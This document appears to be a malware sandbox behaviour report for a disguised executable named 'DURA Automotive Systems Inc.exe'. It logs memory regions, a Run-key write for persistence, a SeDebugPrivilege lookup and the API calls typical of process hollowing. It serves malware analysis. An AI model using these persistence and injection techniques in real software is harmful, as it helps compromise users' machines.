| pagefile_0x00000000006d0000 | 0x006d0000 | 0x007aefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007effff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00977fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x0099ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b8ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x01f8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| mscorrc.dll | 0x01f90000 | 0x01fe3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002010000 | 0x02010000 | 0x0204ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x0207ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x02080000 | 0x020bbfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000020e0000 | 0x020e0000 | 0x021dffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x021e0000 | 0x024aefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x044affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000044b0000 | 0x044b0000 | 0x045affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x046affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000046b0000 | 0x046b0000 | 0x047bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004780000 | 0x04780000 | 0x047bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000048e0000 | 0x048e0000 | 0x0491ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04a8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04c8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04daffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04fbffff | Private Memory | Readable, Writable |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x72be0000 | 0x736d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x736f0000 | 0x73769fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x738d0000 | 0x7390afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x73910000 | 0x73959fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x73960000 | 0x73967fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x73970000 | 0x739cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x739d0000 | 0x73a0efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x73b10000 | 0x73caafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x73cb0000 | 0x7444bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorjit.dll | 0x74450000 | 0x744aafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x745f0000 | 0x7466ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74670000 | 0x7470afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x74740000 | 0x74ceafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74d00000 | 0x74d0dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74d20000 | 0x74d2afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74d30000 | 0x74d45fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74d80000 | 0x74d8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74d90000 | 0x74deffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74ebbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74ec0000 | 0x74faffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x750f0000 | 0x750f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75180000 | 0x752dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x755e0000 | 0x7568bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x75690000 | 0x7572ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75730000 | 0x7578ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75790000 | 0x7582cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x75830000 | 0x75839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x758d0000 | 0x7595ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75960000 | 0x75a6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x75b00000 | 0x76749fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x767f0000 | 0x76808fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x768a0000 | 0x768e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76ad0000 | 0x76bcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76bd0000 | 0x76c26fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076e30000 | 0x76e30000 | 0x76f29fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076f30000 | 0x76f30000 | 0x7704efff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77050000 | 0x771f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77230000 | 0x773affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe.config | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe | type = file_attributes |
|
1 | |
| Delete | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe | - |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = DURA Automotive Systems Inc, data = 0, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = DURA Automotive Systems Inc, data = C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe, size = 188, type = REG_SZ |
|
1 |
Module (341)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 |
|
8 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 |
|
10 | |
| Get Filename | c:\windows\syswow64\kernel32.dll | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 |
|
10 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 |
|
10 | |
| Get Filename | c:\windows\syswow64\advapi32.dll | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 |
|
9 | |
| Get Filename | c:\windows\syswow64\ntdll.dll | process_name = c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x759749d7 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetKernelObjectSecurity, address_out = 0x756a4645 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetKernelObjectSecurity, address_out = 0x756a462d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessA, address_out = 0x75971072 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadContext, address_out = 0x759979d4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadContext, address_out = 0x759f5393 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadProcessMemory, address_out = 0x7598cfcc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x7598d9e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtUnmapViewOfSection, address_out = 0x7724fc70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x7598d9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResumeThread, address_out = 0x759743ef |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
3 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = appdata, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
2 |
Process #9: dura automotive systems inc.exe
1175
7
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:16:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:13:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7f0 |
| Parent PID | 0x530 (c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7F4
0x
514
0x
518
0x
2F0
0x
5E0
0x
30C
0x
2E8
0x
458
0x
3A8
0x
594
0x
63C
0x
5CC
0x
628
0x
160
0x
138
0x
12C
0x
170
0x
148
0x
144
0x
558
0x
650
0x
1B4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| dura automotive systems inc.exe | 0x000b0000 | 0x000effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0019ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | - |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x003c0000 | 0x003c2fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
